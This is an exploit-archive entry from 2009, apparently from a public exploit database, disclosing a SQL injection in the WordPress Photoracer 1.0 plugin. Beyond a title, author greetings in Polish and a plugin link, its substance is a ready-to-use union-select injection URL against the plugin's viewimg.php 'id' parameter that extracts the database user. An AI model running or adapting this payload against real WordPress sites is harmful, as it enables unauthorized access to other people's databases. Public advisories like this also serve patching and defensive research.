[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability
# Published : 2009-06-15
# Author : Kacper
# Previous Title : Joomla Component com_ijoomla_rss Blind SQL Injection Exploit
# Next Title : phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln
Wordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/
Author: Kacper
Website: http://devilteam.pl/
Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum,
Pozdro: Ratman, Kopaczka, FDJ
Elo: dla GLOBUSa za pomoc w crackowaniu hasel.
Vuln:
http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
big thanks str0ke for you!
be safe all :)
# www.Syue.com [2009-06-15]